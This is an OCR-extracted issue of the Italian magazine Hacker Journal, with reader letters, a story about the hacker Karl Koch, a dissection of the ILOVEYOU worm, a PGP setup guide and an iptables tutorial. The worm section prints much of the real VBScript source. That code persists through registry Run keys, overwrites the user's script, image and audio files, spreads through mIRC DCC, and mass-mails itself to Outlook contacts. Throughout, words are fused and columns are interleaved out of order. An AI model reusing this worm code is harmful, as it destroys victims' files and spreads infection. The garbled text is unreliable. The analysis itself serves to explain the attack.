Vi sarei grato se pubblicaste il link delmio sito, un sito dove poter trovare di tut-to, e quello che non c'è basta chiederlo.

Tabbo80

Posso chiedere anche una margherita euna media chiara?

www.lupin3rd.org

Ecco il sito che voglio segnalare a tutti i costi.Matrox

Per il costo possiamo senz'altro metterci d'accordo.Però... quel sondaggio sul miglior film riguardante l'hacking ioda qualche parte l'ho già visto. Mah?

http://virgolamobile.50megs.com/hacker-howto-it.htmlSe cercate info su dove recuperareexploit, crack e seriali, avete sba-gliato indirizzo. Se invece voletediventare "davvero" un hacker,questa guida scritta da Eric S. Rey-mond è il posto giusto da cui parti-re. L'indirizzo qui sopra si riferiscealla sua traduzione italiana (c'è co-munque il link all'originale ingleseper chi lo preferisce). Tra le altrecose degne di nota scritte o curateda Eric, ci sono senz'altro il JargonFile e The Cathedral and the Ba-zaar. Ci arrivate dalla sua homepage: www.tuxedo.org/~esr

Il tuo sito suhackerjournal.itÈ attiva la sezione link del nostrosito: se hai un sito dedicatoall'hacking o alla tecnologia ingenerale, puoi aggiungerlo allanostra directory, che è in continuacrescita.La pagina con il modulo dacompilare per l'inserimento èa l l ' i n d i r i z z owww.hackerjournal.it/Links/Links.htmFai clic su "Aggiuni un sito" ecompila il modulo in ogni suaparte.

Segnalate

i vostri si

ti a:

redazione@

hackerjournal.it

n Pc, una linea telefonica, un ge-nio dei computer un po’ sbanda-to, la sua morte misteriosa. Ci so-no proprio tutti gli ingredienti delgiallo nella storia di Karl Koch, l’-

hacker tedesco morto bruciato nella suaauto il 23 maggio del 1989, pochi giorniprima di deporre in tribunale per una storiaancora tutta da comprendere. Koch, genio ri-belle, infanzia difficile e adolescenza fatta dispinelli e coca, del computer ha fatto la suavita. E, forse, proprio per il computer, l’hapersa.

Quando le sue azioni di hackeraggio l’han-no spinto a infilarsi nelle reti informatiche sta-tunitensi, inizialmente solo per gioco, le cose

si sono fatte più grosse di lui, di Pengo e diquel gruppo di aderenti al Chaos Com-puter Club. Sì, perché in una Germa-nia alle prese con la caduta delmuro di Berlino, questo gruppo digiovanissimi hackers decise diporre all’attenzione del Kgb tuttoil materiale raccolto. Materiale im-portante? Probabilmente no. Ma lastoria di Koch non può comunquenon affascinare. L’innamoramentonei confronti di Hagbard Celine, fi-gura centrale del romanzo Gli Illu-minati!, non è semplicemente il vo-

ler cercare una figura di mitizzare atutti i costi. Ha solo 14 anni, Karl, quandolegge un romanzo regalatogli forse per sba-glio dal padre alcolista. Gli Illuminati so-no una potente congregazione segre-ta che tenta di provocare la terzaguerra mondiale; Hagbard Celine tentadi combatterli. “Lui è un folle genio – ricordaspesso Karl – altamente qualificato, in gradodi esercitare tutta una serie di attività che va-

riano dalla giurisprudenza all’ingegneria”.Sceglie di fare il pirata, Hagbard, viaggiandosul suo sottomarino dorato. Si avvale dellacollaborazione di un computer (Fuckup) checalcola senza sosta il destino del mondo. Unpersonaggio affascinante. Che lo accompa-gnerà nella sua crescita. In pochi anni Karlperde la mamma e il papà. Proprio con l’ere-

personaggio

CURIOSITA’

Ci sono tutti gli elementi del giallo nella storia di Karl Koch, l’hacker tedesco morto incircostanze misteriose...

HACKER STORY


U

Mistero 23

k23, la storia dell’hacker Karl Kochè il libro di Hans-Christian Schmide Michael Gutmann scritto sullavicenda del giovane hacker tede-sco morto il 23 maggio del 1989.Da queste pagine è stato trattoanche il film “23”, interamentededicato al mondo hacker. Il libroè edito dalla ShaKe edizioniUnderground (viale Bligny 42 –Milano).

>> Giochi pericolosi

Un numero misterioso,anarchico: il 23. KarlKock è morto il 23.5

all’età di 23 anni. Tutti i piùgrandi anarchici sono morti ilgiorno 23, come scrisse “DerSpiegel”. Quel numero attiròmolto Karl, nel suo studio sullecospirazioni. Pensò ad esempioall’omicidio del primo ministrosvedese Olof Palme, avvenuto unasera alle 23 e 23. L’idea ultimache aveva Karl era che tuttinoi, senza saperlo, serviamo gliscopi degli Illuminati. Ilnumero 23 proviene proprio dalromanzo di Robert Anton Wilsondiventato un cult per l’hackertedesco, e il 23 si ritrovò nelracconto (23 Skidoo!) delloscrittore Burroughs, amico diWilson. Burroughs, una volta,raccontò di aver conosciuto unmarittimo che navigava da 23anni e che si vantava di nonaver mai avuto incidenti: quellostesso giorno il traghetto sucui viaggiava questo marittimoaffondò. Alla sera Burroughsaccese la radio perascoltare tuttele notizie sullavicenda eascoltò un’altranotizia: un aereoera precipitatosulla rotta NewYork – Miami: ilvolo era registratocol numero 23! Eancora: il 23.5.1949entrò in vigore lacostituzione dellaRepubblica federaleTedesca in vigore fino al23.5.1999. E lo sapete che il23.5 vennero uccisi Bonnie &Clyde e il magistrato GiovanniFalcone? Infine, il giornodell’inizio delle riprese di 23,morì Borroughs. Un numero, undestino.

dità del padre compra un computer potenteche gli permette, finalmente, “di entrare nelmodo giusto nella scena dei computer”. Un’entrata forte, sconvolgente. Karl passa lesue notti davanti al monitor, la mattina ci so-no montagne di carta vicino alla stampante.Si nutre di caffè e succhi multivitamini-ci, fuma sigarette e dall’hashish èpassato a droghe più pesanti. Il pavi-mento è un tappeto di dischetti e ma-trici per incidere schede. Che cosa stavafacendo? A che cosa stava lavorando quelKarl Koch, a un passo dalla maggiore età,diventato ormai nel mondo degli informaticisemplicemente “Hagbard”? Gli atti eroicidegli hacker americani ormai sono ben notianche in Germania e nell’84 nasce il ChaosComputer Club. Con quale scopo? “Effet-

tuare servizi di pattuglia ai margini dell’irri-conoscibile, sensibilizzando l’opinione pub-blica sul problema della sicurezza dei dati…comportandosi in modo offensivo ma ami-chevole, sottolineando come gli hacker mo-strino proprio i punti deboli nel settore dellasicurezza”. Scrive Karl in un’autobiografia:“Con un paio di eccezioni, vivo nell’isola-mento del mio ambiente e della mia cerchiadi amicizie. Le sessioni di hackeraggio dura-no giorni e notti. Comunico, nella maggiorparte dei casi, tramite il computer… Dedicoil mio tempo solo al computer”. Le sessioni

di hackeraggio si fanno sempre più frequen-ti. Quando parte l’azione di hacking al cen-tro di ricerca nucleare Fermilab di Chicago,Hagbard è in primissima linea. L’Fbi lo sco-pre, ma non ci sono prove e il vuoto legislati-vo fa il resto, per una materia legale ancoratutta da scoprire. La banca dati Optimis delPentagono, poi, diventa l’obiettivo preferitodegli hacker, ma Karl pensa ad altro: ilNorad, ovvero il centro di controllostrategico per la difesa aerea degliUsa. Vuole entrare nel sistema proprio comenel film War Games. Scopre l’accesso e inaccordo con l’hacker Urmel, decide di… la-sciar perdere. “Sarebbero stati guai”.

Ma le lunghe notti trascorse davanti al com-puter convincono Karl di una cosa: ha unamissione personale nell’imminenteguerra informatica tra le potenzemondiali. Un’idea, questa, maturata e cor-roborata dai successi nell’hacking notturno,quando ogni calcolatore che sembra appa-


>> Una missione

rentemente inaccessibile diventa, in realtà,facile da “scardinare”. Gli hacker esconopiano piano allo scoperto, anche con lo sco-po di gettare lontane le accuse di essere solodei criminali: durante la fiera informatica Ce-bit di Hannover, così, Hagbard ha un voltoanche per i giornalisti: si mette alla scrivania,davanti a un computer, e inizia a violare la li-nea delle poste tedesche, scruta i dati dell’U-niversità di Caltec, in California. I giornali ini-ziano a concentrarsi sempre più sulle vicendedi questa dozzina di hackers tedeschi capacidi entrare anche nel computer centrale dellaNasa. E quando a qualcuno viene inmente di rivolgersi ai servizi segretirussi, il gioco dura poco. Arrivano i soldiper Karl, Pengo, Dob e Pedro, ma arrivanoanche i guai. Karl finisce in un angolo, sem-pre più isolato. Viene costantemente pedina-to dai servizi segreti dell’Est e naufraga neisuoi pensieri sugli Illuminati. Cerca di riemer-gere, cerca soldi, cerca di trovare lo scoopper giornalisti pronti a tutto… Trova soltantola morte. Suicidio, scrivono sui documenti uf-ficiali. L’hanno suicidato, dice qualcuno.Fine di un hacker. Sbandato, ma geniale. K

RIFERIMENTIhttp://www.hagbard-celine.de/

http://www.decoder.ithttp://www.shake.ithttp://www.mtr.webconcept.de/D/KarlKoch.htmlhttp://www.ccc.de/

SVISCERATO, STRINGA PER STRINGA, IL VIRUS PIÙ FAMOSO

VIRUS


Love You è un programma scritto in Visual BasicScript, linguaggio prossimo a Visual Basic. Il virus ècontenuto in una cartella chiamata "Love Letter foryou.txtx.vbs". Di primo acchito questa doppia esten-sione può essere molto vistosa, ma al contrario,questa permette di attrarre l'attenzione delle vittime.

Di sistema, Windows nasconde le estensioni conosciute. Vbs èun'estensione riconosciuta da Windows ed eseguibile conWscript.exe. Il nome del file virus appare solo con il nome di"Love letter for you.txt", ciò può portare a pensare che si trattiunicamente di un file di testo classico. L'avrete capito, in casodi apertura di questo file, non sarà il bloc-notes ad essere lan-ciato, ma Wscript.exe eseguendo il virus. Parecchie conse-guenze seguono l'esecuzione di questo virus. Innanzitutto al-cuni dati nel database vengono modificati permettendo così alvirus di essere lanciato ad ogni avvio del vostro computer; diseguito alcuni parametri di Internet Explorer per facilitare laproliferazione di un cavallo di troia. Ma il più grave problema,che spiega la enorme diffusione del virus, è che durante l'ese-cuzione viene automaticamente rispedito come allegato (cosìcome l'abbiamo ricevuto) ai contatti della nostra rubrica diOutlook. Così senza nemmeno saperlo, non solo infettate ilvostro computer, ma contribuite a propagarlo. Infine questo vi-rus è stato diffuso tramite IRC, vale a dire una rete di chat.Scopriamo assieme una parte del code source di questo viruscon il fine di capire meglio come funziona e come il virus I Lo-ve You abbia potuto diffondersi così facilmente.

rem barok -loveletter(vbe) rem by: spyder / [email protected] /@GRAMMERSoft Group /Manila,Philippines[...]

I Le due prime righe del code source corrispondono al-la firma degli autori del virus, firma che dall'inizio hafatto pensare che il virus provenisse dalle filippine.

Set dirwin = fso.GetSpecialFolder(0)Set dirsystem = fso.GetSpecialFolder(1)Set dirtemp = fso.GetSpecialFolder(2)Set c = fso.GetFile(WScript.ScriptFullNa-me)c.Copy(dirsystem&"\MSKernel32.vbs")c.Copy(dirwin&"\Win32DLL.vbs")c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")[...]

Grazie a questa sintassi il virus è copiato in diversi file come:

C:\Windows\System\MSKernel32.vbsC:\Windows\System\Win32DLL.vbsC:\Windows\System\ LOVE-LETTER-FOR-YOU.TXT.vbs

sub regruns()On Error Resume NextDim num,downreadregcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"regcreate

>> Firma degli autori

>> Diffusione del virus nel nostro sistema

Il mese di maggio del 2000 è stato - informaticamente -segnato dalla comparsa del virus "I Love You", questo si propagava per e-mail sotto forma di allegato. Con un nome così accattivante, furono numerose le vittime acadere nel tranello. Scopriamo oggi i segreti sul funzionamento di uno dei virus più famosi del mondo...

I segreti del virus I Love YouI segreti del virus I Love You

>>


elseif(ext="mp3") or (ext="mp2") thenset mp3=fso.CreateTextFile(f1.path&".vbs")mp3.write vbscopymp3.closeset att=fso.GetFile(f1.path)att.attributes=att.attributes+2end if

la stessa sorte tocca ai file .mp3 e .mp2

if (eq<>folderspec) thenif (s="mirc32.exe") or (s="mlink32.exe")or (s="mirc.ini") or(s="script.ini") or (s="mirc.hlp") thenset scriptini=fso.CreateTextFile(folder-spec&"\script.ini")scriptini.WriteLine "[script]"scriptini.WriteLine ";mIRC Script"scriptini.WriteLine "; Please dont editthis script... mIRC will corrupt,if mIRC will"scriptini.WriteLine " corrupt... WINDOWSwill affect and will not run

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"downread=""downread=regget("HKEY_CURRENT_USER\Softwa-re\Microsoft\InternetExplorer\Download Directory")if (downread="") thendownread="c:\"end if[...]

In più, la procedura regruns infetta la base dei registri con il finedi eseguire ad ogni avviodel vostro PC. Notiamo che altre modi-fiche vengono fatte al database, come quella che permette ildownload automatico del cavallo di troia con l'intento di infetta-re il computer.

if (ext="vbs") or (ext="vbe") thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.close

Così il computer cancella i file che contengono l'estensione.vbs e .vbe

elseif(ext="js") or (ext="jse") or(ext="css") or (ext="wsh") or (ext="sct")or (ext="hta") thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closebname=fso.GetBaseName(f1.path)set cop=fso.GetFile(f1.path)cop.copy(folderspec&"\"&bname&".vbs")fso.DeleteFile(f1.path)

succede la stessa cosa ai file con esten-sione .js, .jse, .css, .wsh, .sct, e.hta, vengono eliminati e sostituiti dafile con estensione .vbs

elseif(ext="jpg") or (ext="jpeg") thenset ap=fso.OpenTextFile(f1.path,2,true)ap.write vbscopyap.closeset cop=fso.GetFile(f1.path)cop.copy(f1.path&".vbs")fso.DeleteFile(f1.path)

idem per i file con estensione .jpg e.jpeg che sono cancellati e rimpiazzatida file con lo stesso nome ma aventi l'e-stensione .vbs

>> Infezione dei file con il virus

L’AUTOREEspressione impaurita, tracce di acne sul

viso, scarpe da ginnastica tipo rapper:così il ventitreenne filippino Onel DeGuzman appare improvvisamentedi fronte all'opinione pubblicainternazionale a pochi giornidall'esplosione del virus I love you. Le

accuse a suo carico sono pesanti: è ritenuto responsabile diaver creato e immesso in Rete il virus informatico più dannosomai creato. Orfano di padre, sua madre è proprietaria di unapiccola flotta di pescherecci.Appassionato di computer fin da bambino, era uno deimigliori studenti dell'Ama, una catena di collegeinformatici molto popolare nel Sud-Est asiatico. Lì entrò a farparte di un gruppo chiamato Grammersoft. Si tratta di giovanidi talento accomunati dalla passione per i computer e dallavoglia di farsi largo come programmatori. Sarà proprio quel fatidico nome, inseritoprobabilmente per vezzo e ritrovato all'interno delloscript di I love you, a convogliare i sospetti su di lui.Nonostante le prove schiaccianti a suo carico e la richiesta diestradizione negli Stati Uniti dell'Fbi, non è mai statoincriminato perché nelle Filippine, al momento delfatto, mancava una legge sulla pirateria informatica. De Guzman, che nel mondo degli hacker, e per moltiragazzi filippini, è ormai un Robin Hood che si batte per unInternet "democratico" e soprattutto gratuito, si è sempredichiarato innocente, rinfocolando i dubbi legalilegati ai crimini informatici. Tutto ciò mentre nel mondo serpeggiano i timori sulladebolezza della Rete, sempre più centrale nelle economieoccidentali, attaccabile persino da intraprendenti studenti dipaesi in via di sviluppo.

Virus

SVISCERATO, STRINGA PER STRINGA, IL VIRUS PIÙ FAMOSO


correctly. thanks"scriptini.WriteLine ";"scriptini.WriteLine ";Khaled Mardam-Bey"scriptini.WriteLine ";http://www.mirc.com"scriptini.WriteLine ";"scriptini.WriteLine "n0=on 1:JOIN:#:{"scriptini.WriteLine "n1= /if ( $nick ==$me ) { halt }"scriptini.WriteLine "n2= /.dcc send $nick"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"scriptini.WriteLine "n3=}"scriptini.closeeq=folderspecend ifend ifnextend sub

Il virus I love You testa infine il nostro computer per verificare lapresenza del programma Mirc, che permette di accedere alle chatIrc. Se è così il virus si servirà di questo programma con il fine dipropagarsi ad altri utenti.

x=1regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)if (regv="") thenregv=1end ifif (int(a.AddressEntries.Count)>int(regv))thenfor ctrentries=1 to a.AddressEntries.Countmalead=a.AddressEntries(x)regad=""regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)if (regad="") then

In questa parte del code source del virus, possiamo confermareche il virus richiama l'applicazione Wab.exe. se lanciate l'applica-zione dal menù Start\Esegui potrete rendervi conto che si tratta diuna rubrica di Outlook. Come abbiamo già detto il virus si tra-smette automaticamente a tutti i contatti che fanno parte della no-stra rubrica, senza che ce ne si accorga neppure.

set male=out.CreateItem(0)male.Recipients.Add(malead)male.Subject = "ILOVEYOU"male.Body = vbcrlf&"kindly check the atta-ched LOVELETTER coming from me."male.Attachments.Add(dirsystem&"\LOVE-LET-TER-FOR-YOU.TXT.vbs")male.Sendregedit.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\

"&malead,1,"REG_DWORD"end ifx=x+1nextregedit.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Countelseregedit.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Countend ifnextSet out=NothingSet mapi=Nothingend sub

La sintassi qui sopra permette semplicemente di creare il messag-gio e-mail contenente il virus e di spedirlo a tutti i membri dellavostra rubrica. Ci accorgiamo inoltre che il soggetto che contieneil virus è "I Love You", che il corpo del messaggio, vale a dire il te-sto è "kindly check the attacched loveletter coming from me". L'a-vrete capito, questo messaggio personale che chiede al nostrocorrispondente di aprire la lettera d'amore in allegato, è destina-to ad attirare la curiosità dei nostri corrispondenti con il fine dispingerli ad aprire l'allegato. Infine, il file source del virus (love let-ter for you.txt.vbs) viene aggiunto come allegato nelle mail invia-te ai vostri corrispondenti.Nel code source del file contenente il virus I Love You una proce-dura genera automaticamente una pagina HTML che sarà tra-smessa ai nostri corrispondenti via IRC. Questa pagina HTML con-tiene un ActiveX (vbscript) con il fine di richiamare l'attenzione del-la vittima. La sintassi seguente permette di far defilare un testo.

sub htmlOn Error Resume Nextdimlines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6dta1="<HTML><HEAD><TITLE>LOVELETTER -HTML<?-?TITLE><METANAME=@-@Generator@-@ CONTENT=@-@BAROK VBS- LOVELETTER@-@>"&vbcrlf& _"<META NAME=@-@Author@-@ CONTENT=@-@spyder?-? [email protected] ?-?@GRAMMERSoft Group ?-? Manila, Philippines?-? March 2000@-@>"&vbcrlf& _"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this isgood...@-@>"&vbcrlf& _"<?-?HEAD><BODYONMOUSEOUT=@[email protected]=#-#main#-#;win-dow.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _"ONKEYDOWN=@[email protected]=#-#main#-#;win-dow.open(#-#LOVE-LETTER-FOR-YOU.HTM#

>> Prooagazione del virus attraversoOutlook

>> Diffusione del virus Via IRC

privacy

COME INSTALLARE E USARE PGP, IL PIÙ FAMOSO PROGRAMMA DI CRITTOGRAFIA

18| www.hackerjournal.it

Lasciate perdere le decine di softwarini che promettono di cifrare i vostri documenti:

GP permette allagente comune diavere la propriaprivacy a portata dimano.

C’è un bisogno sociale crescente diquesto. Ecco perché l’ho creato." questele parole di Philip Zimmermann, ilpadre di PGP. Che cos'è PGP? PGP staper Pretty Good Privacy, ed è unsoftware sviluppato nel 1991,appunto, da Philip Zimmermann, checonsente di criptare mediante unsistema di chiavi qualsiasi tipo di dato,in modo da garantire la privacy, peresempio, nello scambio diinformazioni via email o quant'altro.PGP esiste ormai in molte varianti ed ilsuo utilizzo è diffusissimo: criptare idati che ci scambiamo quandoinviamo e riceviamo messaggi di posta

elettronica, tanto per fare l'esempiopiù banale (ma anche quandochattiamo in ICQ, o inviamo files aqualcuno), dovrebbe essere,soprattutto per chi si interessa a tuttele problematiche relative allasicurezza, una pratica comune. Ildiritto e la necessità di avere unabuona privacy vanno al di là delcontenuto dei dati che decidiamo dicriptare: ovvero, non è necessarioavere “qualcosa da nascondere” perusare software come PGP; comesaggiamente afferma Zimmermann, èfiglia del buon senso comune lanecessità di avere la propria privacy aportata di mano. Lasciando per unattimo da parte queste riflessioni sulla

Tenete i dati al riparo

GPG Sebbene i sorgenti siano li-beramente disponibili, PGP è unaproprietà intellettuale. Esiste peròuna versione completamente libe-ra, chiamata GPG, e pubblicata

sotto licenza GPL (www.gnupg.org).

?

�P

>>


l’unico vero programma che merita considerazione è Pretty Good Privacy

privacy, andiamo a vedere comemettere in pratica il tutto: cioccuperemo di PGP sotto Windows,della sua installazione e del suoutilizzo nel lavoro quotidiano. Iniziamocon lo scaricare PGP per Windows, peresempio da qui: http://www.pgpi.org/products/pgp/ver-sions/freeware/ In questo sito (che è quello del progetto in-ternazionale PGP) potremo trovare anchealtre numerose implementazioni di PGP,nonchè versioni diverse del software pernumerosi utilizzi e numerosi sistemi operati-vi. Il pacchetto per Windows 2000 pesa cir-ca 7 mega: una volta ultimato il downloadci troveremo di fronte al solito file .zip nelquale si trova il programma. Lanciando l'in-stallazione, la prima cosa che ci verrà chie-sta sarà se siamo nuovi utenti o se posse-diamo già un “mazzo di chiavi” da impor-tare.

Le chiavi PGP non sono altro che una seriedi dati utilizzati per criptare e decriptare leinformazioni: se per esempio avessimo giàle nostre “chiavi” da usare per decriptare inostri vecchi documenti, dovremo specifi-carlo qui in modo da poterle utilizzare. PGP

lavora con una coppia di chiavi, una pub-blica, liberamente distribuibile per permet-tere ad altri di inviarci materiale cifrato, el’altra privata, da custodire gelosamente eda non rivelare mai a nessuno.Supponiamo di essere nuovi utenti e andia-mo avanti: il wizard di installazione ci chie-

derà adesso di specificare quali componen-ti e quali plugin desideriamo installare.Lasciamo pure selezionate le voci preimpo-state. I vari Plugin risultano molto utili inquanto integrano PGP in altrettante appli-

cazioni comuni, come Outlook, ICQ o Eu-dora, in modo da rendere semplicissimo,per esempio, l'invio di email criptate: in pra-tica vi troverete nella barra dei bottoni delvostro client di posta anche quelli relativi aPGP, e ciò vi solleverà dal dover fare tutto amano. Nel passo successivo ci verrà chiestoquali dispositivi di comunicazione devono

>> Chiavi digitali

da occhi indiscreti

essere presi in considerazione (schede direte e/o modem):A questo punto il wizard avvierà l'installa-zione vera e propria del software. Sarà poiil momento di creare le nostre chiavi (quel-le che, come già detto, ci consentiranno ef-fettivamente di criptare i dati): ci verrà chie-sta una identità (nome ed email) e unapass-phrase, ovvero una frase che il soft-ware utilizzerà per generare le chiavi. Lafrase deve essere sufficientemente comples-

sa. Al termine, dopo il solito riavvio dellamacchina, potremo notare che tra le iconetray della nostra barra degli strumenti saràcomparsa anche quella relativa a PGP:Cliccandoci sopra con il tasto destro potre-mo selezionare tutti i vari tools di PGP, con-figurarne le opzioni o andare a lavorarecon le nostre chiavi, aggiungere utenti etc...A questo punto PGP è correttamente instal-lato sul nostro pc: andando in giro per ilnostro disco fisso e cliccando con il tastodestro del mouse su un qualsiasi file potre-mo notare l'integrazione di PGP con il siste-ma operativo.

Una volta che ci si è “fatta la mano”, usarePGP sarà abbastanza semplice, e decisa-mente consigliabile. È il migliore strumentoper proteggere i nostri documenti da occhiindiscreti, che purtroppo affollano la rete. K

>> Conviene usarlo!

inux contiene il suppor-to per instradamento efiltro dei pacchetti di re-te, che vengono utiliz-

zati tramite IpTables e IP Chains.Ip Chains è più vecchio rispetto aiptables: se avete un kernel prece-dente al 2.2, sarete costretti a usa-re IPChains; se invece avete delledistribuzioni del kernel superiori(la 2.4 è la versione più stabile),IpTables è la scelta giusta. Que-st’ultimo software infatti supportain più il mascheramento e i filtri dipacchetto (dalla 2.3, NetFilter).I pacchetti che attraverseranno ilfirewall vengono conforntati con letabelle di ipTables; se un pacchet-to corriosponde a certe regole(dette anche ACL, da Access Con-trol List), il pacchetto verrà elabo-rato di conseguenza.Per la massima protezione, si con-siglia anche di installare un siste-ma di identificazione delle intru-sioni (IDS, di cui parleremo in se-guito). Linux permette di inoltrare

pacchetti IP, cosa che consente diconfigurarlo come un router. Seavete un computer con un indiriz-zo di rete interna, questo compu-ter non potrà uscire su internetperchè avrà un IP che è riservatoalle reti locali. I pacchetti entranoda una scheda Ethernet vengonotradotti e immessi su Internet conl’IP del router o del firewall con-nesso a internet. Questo tipo difirewall è detto server proxy. Èinoltre possibile inoltrare o modi-

LINUX

L

Teniamo fuori gli intrusi

IMPLEMENTAZIONE DI UN FIREWALL SU LINUX CON IPTABLES

ficare intestazioni IPtramite IpTables, af-finché raggiungano larete Internet.Per fare ciò, IpTablesmanda i pacchetti alkernel al fine di elabo-rarli. Il masheramentosfrutta il servizio NATche consente di usareun indirizzo IP per piùsistemi. Questo servi-zio, basato su Up-chains, non è compati-bile con con i clientVPN che utilizzanoPPTP.Creare una tabella contutte le regole può es-sere un rompicapo, so-pratutto se si utilizza-no reti molto estese.Per questo, con in Ip-Tables a volte bastaassegnare delle regoledi default e modificarle a propriopiacimento.Per creare un filtro ai pacchetti inuscita (proveniente dall’interno) èconsigliabile negare tutti gli acces-si e in seguito accettare quelli cheservono a un determinato servizio.Per esempio, se A (computer inter-no) deve accedere a un serviziohttp su un server Web dall’altraparte del computer B (Firewall), ilcomputer B dovrà lasciare apertala porta 80 e 443 (per l’http)Per creare invece le regole per ipacchetti in entrata è consigliabilebloccare tutto il traffico ICMP al fi-ne di evitare gli attacchi DoS, maquesto potrebbe complicare la ri-soluzione dei problemi per una re-te molto ampia.

Bisognerebbe anche bloccare tuttoil traffico in entrata a meno chenon faccia parte di una connessio-ne già aperta.In ipchains si utilizza l’opzione -y e-SYN in modo che il firewall re-spinga i pacchetti con il flag SYNimpostato, invece i pacchetti con ilbit FIN o ACK vengono accettatiperchè fanno parte di una sessio-ne già aperta.Un’altra cosa molto importante èabilitare la registrazione dei pac-chetti. Con IPchains si utilizza ilparametro -l, con iptables -j LOG(destinazione). Per poter usufruire del firewall apiene prestazioni è necessario im-postare le opzioni Network PacketFiltering nella sezione NEtWorking


Nella maggior parte delle installazioni Linux è già presente la funzionalità di

firewall. Scoprite con noi come è possibile configurare il sistema per rifiutare

i pacchetti sgraditi.

>> Configurazione del firewall come filtro

>>


due tipi differenti di catene rispet-to a Filter:PREROUTING : modifica i pacchet-ti che tentano di entrare nell’inter-facciaPOSTROUING : modifica i pacchet-ti quando lasciano l’host (in uscita)Passiamo alla parte pratica. Perstabilire quali regole applicare,

naturalmente si deve prima deli-neare un profilo della rete, e que-sta è forse la parte più complica-ta. I comandi sono semplici e so-pratutto pochi, ma la cosa piùdifficile è sapere esattamente chefine deve fare ogni pacchetto, alfine di evitare spiacevoli errorinel programmare le regole cheprovocano le intrusioni informati-che. Le azioni più utilizzate sonoDROP e ACCEPTVi conviene quindi creare una ca-

tena personalizzata e modifcarlapoi a vostro piacimento, così:

iptables -N customiptables -A custom -s 0/0 -d 0/0 -p icmp -j DROPiptables -A input -s 0/0 -d 0/0 -jcustom

Nell’esempio, l’opzione A aggiun-ge una regola collocandola all’ini-zio della catena; l’opzione -l ag-giunge la regola alla fine dellacatena, e in seguito aggiunge unaregola che respinge tutti i pac-chetti ICMP in entrata.(DROP = Respingere ACCEPT =Accettare)In router o firewall ci possono pe-rò essere diverse schede di rete:

per esempio, una per la rete in-terna e una per la rete esterna. Senon si specifica un interfaccia direte, verrà usata la prima (per eseth0).In un sistema con due schede que-sta opzione è necessaria perchè inuna rete si può voler bloccare tut-to il traffico TCP in entrata dallarete ma si vuol accettarlo in usci-ta. Per tale scopo si utilizza l’op-zione -i per specificare l’interfac-cia:

iptables -A INPUT - i eth0 -s 0/0 -d 0/0 -protocl icmp-type echo-reply -j REJECTiptables -A INPUT - i eth1 -s 0/0 -d 0/0 -protocl icmp-type echo-reply -j REJECT

Questo comando consente tutto iltraffico ICMP su una rete, ma nonli inoltra con un pacchetto echo-reply (addio ping).Un’altra cosa importante: le politi-che sono impostate di default suAccept, ma sarebbe preferibile

prima impostare tutto su Drop, epoi impostare solo quello che viserve su Accept. In questo modo iiterà di menticare qualche portaaperta.

iptables -P input DROP

Per visualizzare le regole imposta-te finora, potete digitate quantosegue:

iptables -L

Siccome iptables ha tre tabelle,potete scegliere di visualizzarnesolo una con:

iptables -t nat -LSe poi volete visualizzare solo una

Tabella Catene Predefinite Descrizione

filter INPUT FORWARD Filtra i pachettiNat PREROUTING OUTPUT POSTROUTING Abilita MascheramentoMangle PREROUTING OUTPUT POSTROUTIN Galtera i pacchetti

nei kernel fino alla 2.2. Nelle suc-cessive versioni invece dovrebberoesserci le opzioni: Network Fire-wall, TCP/IP networking e IP ac-counting.Quest’ultima opzione (IP accoun-ting) è necessaria per raccogliere idati sui pacchetti e quindi permet-te di ottenere informazioni sull’usodella rete. Per questo scopo il se-

guente file deve essere nella direc-tory /proc/proc/net/ip_acct. Se il file esiste,vuol dire ke il kernel supporta giàla funzione per il filtro di pacchetti.

Passiamo ora alle tabelle e allecatene. Iptables utilizza delle ta-belle predefinite che interagisconocon le interfacce del sistema e ge-stiscono i pacchetti di conseguen-za.Le catene sono delle regole cheutilizza iptables. Come si può ve-dere nel riquadro “Le tabelle diiptables”, questo programma uti-lizza tre tabelle: NAT, Mangle eFilter. iptables usa la tabella Flterper filtrare i pacchetti e la tabella,NAT per mascherarli( ma se non èspecificata, iptables usa quellapredefinita, cioè Flter.

Nella tabella filter ci sono 3 catenepredefinite:INPUT : contiene le regole per ipacchetti in entrata;FORWARD: contiene le regole chediranno se il pacchetto necessitadel mascheramento;OUTPUT : contiene le regole per ipacchetti in uscita;Nelle tabelle Nat e Mangle ci sono

Come si installa?I pacchetti IPchains e iptablessolitamente vengono montatidalle più diffuse distribuzioni nelmomento dell’installazione diLinux. Se così non fosse, proba-bilmente dovrete ricompilare ilkernek per includere anchequeste opzioni.

>> Azioni delle catene e programmazzione delle regole

catena di una tabella, usate:iptables -t nat -L FORWARD

Se volete inoltre salvare il risul-tato su un file (cosa consigliataper possbili problemi seguenti)potete usare questo comando:

/sbin/iptables-save >iptables.txt

(Attenzione: le versioni prece-denti alla 1.2.1a non supporta-no questa opzione)

Inoltre, nel caso il vostro scriptpersonalizzato parte a ogni av-vio del computer per impostarele regole del firewall potete ag-giungere la seguente stringa

iptables -F

che cancella tutte le regole im-postate in Filter, ma non quellein NAT o Mangle, che bisognacancellalre così:

iptables -t nat -F

Tuttavia, per cancellare solouna catena di filtere si usa sem-pre il comando iptables -F macon il nome della catena (peresempio INPUT).I servizi utilizzati da Internet,come FTP, richiedono un suppor-to aggiuntivo. Iptables forniscevari moduli per il maschera-mento, che consentono di acce-dere a queste risorse:

Il comando per richiamare i mo-duli è il seguente:

/sbin/insmod *nomemodulo*

Per mascherare l’IP si usa il se-guente comando :

